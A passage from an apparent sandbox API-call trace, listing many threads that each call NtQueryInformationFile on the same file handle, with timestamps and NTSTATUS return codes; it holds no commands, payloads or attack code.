FileInformation=0x210e20) returned 0x0 Thread: id = 1175 os_tid = 0x4e4 [0163.894] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfd70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfd70, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1176 os_tid = 0xbfc [0163.896] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375ff50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375ff50, FileInformation=0x210e20) returned 0x0 Thread: id = 1177 os_tid = 0x80c [0163.901] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f988, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f988, FileInformation=0x210e20) returned 0x0 Thread: id = 1178 os_tid = 0xbf8 [0163.903] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fd00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fd00, FileInformation=0x210e20) returned 0x0 Thread: id = 1179 os_tid = 0x524 [0163.905] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfb28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfb28, FileInformation=0x210e20) returned 0x0 Thread: id = 1180 os_tid = 0x674 [0163.907] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffae0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffae0, FileInformation=0x210e20) returned 0x0 Thread: id = 1181 os_tid = 0x4a0 [0163.908] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffc08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffc08, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1182 os_tid = 0x5d8 [0163.910] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357feb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357feb0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1183 os_tid = 0x69c [0163.912] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff7c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff7c0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1184 os_tid = 0x6a8 [0163.914] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd08, FileInformation=0x210e20) returned 0x0 Thread: id = 1185 os_tid = 0x500 [0163.916] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357ff80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357ff80, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1186 os_tid = 0x4e0 [0163.918] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371ff80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371ff80, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1187 os_tid = 0x330 [0163.919] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fbc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1188 os_tid = 0xa30 [0163.921] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fa78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fa78, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1189 os_tid = 0xb50 [0163.923] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfda8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfda8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1190 os_tid = 0xb70 [0163.925] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f828, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f828, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1191 os_tid = 0xb6c [0163.927] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fc88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fc88, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1192 os_tid = 0xb74 [0163.929] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f8f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f8f0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1193 os_tid = 0xb68 [0163.931] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f818, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f818, FileInformation=0x210e20) returned 0x0 Thread: id = 1194 os_tid = 0x758 [0163.933] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fee0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fee0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1195 os_tid = 0x3d4 [0163.935] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfc38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfc38, FileInformation=0x210e20) returned 0x0 Thread: id = 1196 os_tid = 0x484 [0163.937] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fb60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fb60, FileInformation=0x210e20) returned 0x0 Thread: id = 1197 os_tid = 0xb4c [0163.939] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f9b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f9b0, FileInformation=0x210e20) returned 0x0 Thread: id = 1198 os_tid = 0xa1c [0163.941] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f920, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f920, FileInformation=0x210e20) returned 0x0 Thread: id = 1199 os_tid = 0x2ac [0163.943] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfc60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfc60, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1200 os_tid = 0xa8c [0163.946] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fdc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fdc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1201 os_tid = 0x68c [0163.948] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fad0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fad0, FileInformation=0x210e20) returned 0x0 Thread: id = 1202 os_tid = 0x388 [0163.950] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfd18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfd18, FileInformation=0x210e20) returned 0x0 Thread: id = 1203 os_tid = 0xa50 [0163.952] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fe78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fe78, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1204 os_tid = 0x75c [0163.953] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df8e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df8e8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1205 os_tid = 0x240 [0163.955] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe98, FileInformation=0x210e20) returned 0x0 Thread: id = 1206 os_tid = 0x320 [0163.957] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fa78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fa78, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1207 os_tid = 0x3b4 [0163.958] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f880, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f880, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1208 os_tid = 0x760 [0163.960] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa28, FileInformation=0x210e20) returned 0x0 Thread: id = 1209 os_tid = 0xb00 [0163.962] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fcb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fcb0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1210 os_tid = 0x7fc [0163.964] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f820, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f820, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1211 os_tid = 0xb18 [0163.966] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfcb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfcb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1212 os_tid = 0xa68 [0163.968] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fe98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fe98, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1213 os_tid = 0x224 [0163.970] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fde0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fde0, FileInformation=0x210e20) returned 0x0 Thread: id = 1214 os_tid = 0x2c4 [0163.972] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfcf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfcf8, FileInformation=0x210e20) returned 0x0 Thread: id = 1215 os_tid = 0x24c [0163.974] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf990, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf990, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1216 os_tid = 0x4e8 [0163.976] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fd58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fd58, FileInformation=0x210e20) returned 0x0 Thread: id = 1217 os_tid = 0x220 [0163.978] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df868, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df868, FileInformation=0x210e20) returned 0x0 Thread: id = 1218 os_tid = 0xb04 [0163.981] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36fff08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36fff08, FileInformation=0x210e20) returned 0x0 Thread: id = 1219 os_tid = 0x180 [0163.982] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fad0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fad0, FileInformation=0x210e20) returned 0x0 Thread: id = 1220 os_tid = 0x53c [0163.984] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffcc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffcc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1221 os_tid = 0x5b4 [0163.986] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfcc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfcc8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1222 os_tid = 0x614 [0163.988] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfab0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfab0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1223 os_tid = 0x690 [0163.990] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fd70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fd70, FileInformation=0x210e20) returned 0x0 Thread: id = 1224 os_tid = 0x440 [0163.992] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fbc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1225 os_tid = 0x7d8 [0163.994] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfe10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfe10, FileInformation=0x210e20) returned 0x0 Thread: id = 1226 os_tid = 0xa60 [0163.996] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f978, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f978, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1227 os_tid = 0xb24 [0163.998] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375ff58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375ff58, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1228 os_tid = 0x878 [0164.000] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fdb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fdb0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1229 os_tid = 0xb1c [0164.002] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fd40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fd40, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1230 os_tid = 0xb08 [0164.004] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fd20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fd20, FileInformation=0x210e20) returned 0x0 Thread: id = 1231 os_tid = 0x4fc [0164.005] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfcf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfcf0, FileInformation=0x210e20) returned 0x0 Thread: id = 1232 os_tid = 0x4dc [0164.008] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fd28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fd28, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1233 os_tid = 0x43c [0164.009] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fc00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fc00, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1234 os_tid = 0x1c4 [0164.011] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc50, FileInformation=0x210e20) returned 0x0 Thread: id = 1235 os_tid = 0xbec [0164.013] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df830, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df830, FileInformation=0x210e20) returned 0x0 Thread: id = 1236 os_tid = 0xb48 [0164.015] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fe80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fe80, FileInformation=0x210e20) returned 0x0 Thread: id = 1237 os_tid = 0x5bc [0164.017] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fe00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fe00, FileInformation=0x210e20) returned 0x0 Thread: id = 1238 os_tid = 0x6b8 [0164.018] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fd50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fd50, FileInformation=0x210e20) returned 0x0 Thread: id = 1239 os_tid = 0x2dc [0164.020] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f8e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f8e0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1240 os_tid = 0x158 [0164.025] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fa28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fa28, FileInformation=0x210e20) returned 0x0 Thread: id = 1241 os_tid = 0x6cc [0164.027] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfaf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfaf0, FileInformation=0x210e20) returned 0x0 Thread: id = 1242 os_tid = 0x694 [0164.029] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffea8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffea8, FileInformation=0x210e20) returned 0x0 Thread: id = 1243 os_tid = 0x6d8 [0164.031] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fb70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fb70, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1244 os_tid = 0x87c [0164.033] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fbc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1245 os_tid = 0xb88 [0164.039] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fb40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fb40, FileInformation=0x210e20) returned 0x0 Thread: id = 1246 os_tid = 0xb8c [0164.041] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df8e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df8e0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1247 os_tid = 0x700 [0164.044] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb38, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1248 os_tid = 0x6f0 [0164.046] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fe10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fe10, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1249 os_tid = 0x130 [0164.048] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fed8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fed8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1250 os_tid = 0x754 [0164.050] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fd98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fd98, FileInformation=0x210e20) returned 0x0 Thread: id = 1251 os_tid = 0x72c [0164.052] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f8e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f8e0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1252 os_tid = 0x748 [0164.054] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd38, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1253 os_tid = 0x928 [0164.056] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa38, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1254 os_tid = 0xcc [0164.058] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfda0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfda0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1255 os_tid = 0xd0 [0164.060] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371ff20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371ff20, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1256 os_tid = 0xd4 [0164.062] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff818, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff818, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1257 os_tid = 0xd8 [0164.063] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359feb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359feb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1258 os_tid = 0xdc [0164.065] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f7d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f7d0, FileInformation=0x210e20) returned 0x0 Thread: id = 1259 os_tid = 0xe0 [0164.067] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfee8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfee8, FileInformation=0x210e20) returned 0x0 Thread: id = 1260 os_tid = 0xe4 [0164.069] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff858, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff858, FileInformation=0x210e20) returned 0x0 Thread: id = 1261 os_tid = 0xe8 [0164.071] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f8d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f8d8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1262 os_tid = 0xec [0164.073] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fb40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fb40, FileInformation=0x210e20) returned 0x0 Thread: id = 1263 os_tid = 0x9d8 [0164.080] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfe10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfe10, FileInformation=0x210e20) returned 0x0 Thread: id = 1264 os_tid = 0x898 [0164.083] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f818, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f818, FileInformation=0x210e20) returned 0x0 Thread: id = 1265 os_tid = 0x48c [0164.085] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373ff10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373ff10, FileInformation=0x210e20) returned 0x0 Thread: id = 1266 os_tid = 0x6a4 [0164.087] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df7e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df7e0, FileInformation=0x210e20) returned 0x0 Thread: id = 1267 os_tid = 0x20c [0164.090] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367ff18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367ff18, FileInformation=0x210e20) returned 0x0 Thread: id = 1268 os_tid = 0x630 [0164.092] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfa30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfa30, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1269 os_tid = 0x5e4 [0164.094] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f9e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f9e0, FileInformation=0x210e20) returned 0x0 Thread: id = 1270 os_tid = 0xb28 [0164.095] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fcd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fcd0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1271 os_tid = 0xb20 [0164.098] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfc80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfc80, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1272 os_tid = 0x704 [0164.100] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffd48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffd48, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1273 os_tid = 0x568 [0164.102] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fbc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1274 os_tid = 0x5ac [0164.104] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fc58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fc58, FileInformation=0x210e20) returned 0x0 Thread: id = 1275 os_tid = 0x908 [0164.106] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe90, FileInformation=0x210e20) returned 0x0 Thread: id = 1276 os_tid = 0x888 [0164.108] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfb88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfb88, FileInformation=0x210e20) returned 0x0 Thread: id = 1277 os_tid = 0x544 [0164.110] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df790, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df790, FileInformation=0x210e20) returned 0x0 Thread: id = 1278 os_tid = 0x76c [0164.112] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f920, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f920, FileInformation=0x210e20) returned 0x0 Thread: id = 1279 os_tid = 0xa9c [0164.114] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff928, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff928, FileInformation=0x210e20) returned 0x0 Thread: id = 1280 os_tid = 0x114 [0164.116] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f9d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f9d8, FileInformation=0x210e20) returned 0x0 Thread: id = 1281 os_tid = 0x5b8 [0164.118] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffc08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffc08, FileInformation=0x210e20) returned 0x0 Thread: id = 1282 os_tid = 0x814 [0164.120] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fe60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fe60, FileInformation=0x210e20) returned 0x0 Thread: id = 1283 os_tid = 0x834 [0164.122] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfb60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | 